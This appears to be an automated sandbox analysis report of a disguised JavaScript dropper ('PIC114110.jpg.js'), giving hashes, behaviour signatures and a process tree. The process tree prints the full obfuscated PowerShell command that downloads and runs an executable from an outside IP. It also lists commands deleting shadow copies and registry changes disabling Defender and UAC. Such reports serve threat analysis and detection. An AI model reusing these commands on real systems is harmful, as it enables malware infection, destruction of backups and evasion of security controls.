Analysis
-
max time kernel
131s -
max time network
134s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
08-07-2020 01:06
Static task
static1
Behavioral task
behavioral1
Sample
PIC114110.jpg.js
Resource
win7
Behavioral task
behavioral2
Sample
PIC114110.jpg.js
Resource
win10v200430
General
-
Target
PIC114110.jpg.js
-
Size
83KB
-
MD5
821a6c3122354612133a542992bab324
-
SHA1
efdbbf3dbeed7f53ccf2b73d7afcc6d16c8ca320
-
SHA256
370dbeca970b02f6c1a07803c736de0fa30a40851f7a21178eb0bdaa16af61ab
-
SHA512
6474f350bf4790a681677400019d2540d75468d307535a73f296acb3792fb8b19e14140c6b0ad712cd91d493fdeea59048117d07853f2d6c6f189a906a17dc46
Malware Config
Extracted
http://217.8.117.63/tstjs.exe
Signatures
-
Suspicious use of AdjustPrivilegeToken 67 IoCs
description pid Process Token: SeDebugPrivilege 1548 powershell.exe Token: SeIncreaseQuotaPrivilege 3392 wmic.exe Token: SeSecurityPrivilege 3392 wmic.exe Token: SeTakeOwnershipPrivilege 3392 wmic.exe Token: SeLoadDriverPrivilege 3392 wmic.exe Token: SeSystemProfilePrivilege 3392 wmic.exe Token: SeSystemtimePrivilege 3392 wmic.exe Token: SeProfSingleProcessPrivilege 3392 wmic.exe Token: SeIncBasePriorityPrivilege 3392 wmic.exe Token: SeCreatePagefilePrivilege 3392 wmic.exe Token: SeBackupPrivilege 3392 wmic.exe Token: SeRestorePrivilege 3392 wmic.exe Token: SeShutdownPrivilege 3392 wmic.exe Token: SeDebugPrivilege 3392 wmic.exe Token: SeSystemEnvironmentPrivilege 3392 wmic.exe Token: SeRemoteShutdownPrivilege 3392 wmic.exe Token: SeUndockPrivilege 3392 wmic.exe Token: SeManageVolumePrivilege 3392 wmic.exe Token: 33 3392 wmic.exe Token: 34 3392 wmic.exe Token: 35 3392 wmic.exe Token: 36 3392 wmic.exe Token: SeBackupPrivilege 1836 vssvc.exe Token: SeRestorePrivilege 1836 vssvc.exe Token: SeAuditPrivilege 1836 vssvc.exe Token: SeIncreaseQuotaPrivilege 1580 wmic.exe Token: SeSecurityPrivilege 1580 wmic.exe Token: SeTakeOwnershipPrivilege 1580 wmic.exe Token: SeLoadDriverPrivilege 1580 wmic.exe Token: SeSystemProfilePrivilege 1580 wmic.exe Token: SeSystemtimePrivilege 1580 wmic.exe Token: SeProfSingleProcessPrivilege 1580 wmic.exe Token: SeIncBasePriorityPrivilege 1580 wmic.exe Token: SeCreatePagefilePrivilege 1580 wmic.exe Token: SeBackupPrivilege 1580 wmic.exe Token: SeRestorePrivilege 1580 wmic.exe Token: SeShutdownPrivilege 1580 wmic.exe Token: SeDebugPrivilege 1580 wmic.exe Token: SeSystemEnvironmentPrivilege 1580 wmic.exe Token: SeRemoteShutdownPrivilege 1580 wmic.exe Token: SeUndockPrivilege 1580 wmic.exe Token: SeManageVolumePrivilege 1580 wmic.exe Token: 33 1580 wmic.exe Token: 34 1580 wmic.exe Token: 35 1580 wmic.exe Token: 36 1580 wmic.exe Token: SeIncreaseQuotaPrivilege 2732 wmic.exe Token: SeSecurityPrivilege 2732 wmic.exe Token: SeTakeOwnershipPrivilege 2732 wmic.exe Token: SeLoadDriverPrivilege 2732 wmic.exe Token: SeSystemProfilePrivilege 2732 wmic.exe Token: SeSystemtimePrivilege 2732 wmic.exe Token: SeProfSingleProcessPrivilege 2732 wmic.exe Token: SeIncBasePriorityPrivilege 2732 wmic.exe Token: SeCreatePagefilePrivilege 2732 wmic.exe Token: SeBackupPrivilege 2732 wmic.exe Token: SeRestorePrivilege 2732 wmic.exe Token: SeShutdownPrivilege 2732 wmic.exe Token: SeDebugPrivilege 2732 wmic.exe Token: SeSystemEnvironmentPrivilege 2732 wmic.exe Token: SeRemoteShutdownPrivilege 2732 wmic.exe Token: SeUndockPrivilege 2732 wmic.exe Token: SeManageVolumePrivilege 2732 wmic.exe Token: 33 2732 wmic.exe Token: 34 2732 wmic.exe Token: 35 2732 wmic.exe Token: 36 2732 wmic.exe -
Suspicious behavior: EnumeratesProcesses 545 IoCs
pid Process 1548 powershell.exe 1548 powershell.exe 1548 powershell.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe 3284 2705719231.exe -
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 952 vssadmin.exe 3600 vssadmin.exe 2120 vssadmin.exe -
Enumerates connected drives 3 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 1492 TempLrD47.exe 2572 taskhostw.exe 3284 2705719231.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" taskhostw.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" taskhostw.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2705719231.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini 2705719231.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blacklisted process makes network request 1 IoCs
flow pid Process 3 1548 powershell.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\218571821623978\\taskhostw.exe" TempLrD47.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\218571821623978\\taskhostw.exe" TempLrD47.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\218571821623978\taskhostw.exe TempLrD47.exe File opened for modification C:\Windows\218571821623978\taskhostw.exe TempLrD47.exe File opened for modification C:\Windows\218571821623978 TempLrD47.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1" taskhostw.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2705719231.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 2705719231.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 988 wrote to memory of 1272 988 wscript.exe 68 PID 988 wrote to memory of 1272 988 wscript.exe 68 PID 1272 wrote to memory of 1548 1272 cmd.exe 70 PID 1272 wrote to memory of 1548 1272 cmd.exe 70 PID 1272 wrote to memory of 1492 1272 cmd.exe 71 PID 1272 wrote to memory of 1492 1272 cmd.exe 71 PID 1272 wrote to memory of 1492 1272 cmd.exe 71 PID 1492 wrote to memory of 2572 1492 TempLrD47.exe 73 PID 1492 wrote to memory of 2572 1492 TempLrD47.exe 73 PID 1492 wrote to memory of 2572 1492 TempLrD47.exe 73 PID 2572 wrote to memory of 3284 2572 taskhostw.exe 77 PID 2572 wrote to memory of 3284 2572 taskhostw.exe 77 PID 2572 wrote to memory of 3284 2572 taskhostw.exe 77 PID 3284 wrote to memory of 3392 3284 2705719231.exe 78 PID 3284 wrote to memory of 3392 3284 2705719231.exe 78 PID 3284 wrote to memory of 3392 3284 2705719231.exe 78 PID 3284 wrote to memory of 952 3284 2705719231.exe 82 PID 3284 wrote to memory of 952 3284 2705719231.exe 82 PID 3284 wrote to memory of 952 3284 2705719231.exe 82 PID 3284 wrote to memory of 1580 3284 2705719231.exe 85 PID 3284 wrote to memory of 1580 3284 2705719231.exe 85 PID 3284 wrote to memory of 1580 3284 2705719231.exe 85 PID 3284 wrote to memory of 3600 3284 2705719231.exe 87 PID 3284 wrote to memory of 3600 3284 2705719231.exe 87 PID 3284 wrote to memory of 3600 3284 2705719231.exe 87 PID 3284 wrote to memory of 2732 3284 2705719231.exe 89 PID 3284 wrote to memory of 2732 3284 2705719231.exe 89 PID 3284 wrote to memory of 2732 3284 2705719231.exe 89 PID 3284 wrote to memory of 2120 3284 2705719231.exe 91 PID 3284 wrote to memory of 2120 3284 2705719231.exe 91 PID 3284 wrote to memory of 2120 3284 2705719231.exe 91 -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 api.myip.com 11 api.myip.com -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2705719231.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PIC114110.jpg.js1⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SGIuanAqBiKFHsR & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','%temp%LrD47.exe'); & %temp%LrD47.exe & IzCrmFNBwYXdgpf2⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','C:\Users\Admin\AppData\Local\TempLrD47.exe');3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1548
-
-
C:\Users\Admin\AppData\Local\TempLrD47.exeC:\Users\Admin\AppData\Local\TempLrD47.exe3⤵
- Executes dropped EXE
- Adds Run entry to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\218571821623978\taskhostw.exeC:\Windows\218571821623978\taskhostw.exe4⤵
- Executes dropped EXE
- Windows security bypass
- Modifies Windows Defender Real-time Protection settings
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Users\Admin\AppData\Local\Temp\2705719231.exeC:\Users\Admin\AppData\Local\Temp\2705719231.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- UAC bypass
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3284 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet6⤵
- Interacts with shadow copies
PID:952
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet6⤵
- Interacts with shadow copies
PID:3600
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet6⤵
- Interacts with shadow copies
PID:2120
-
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1836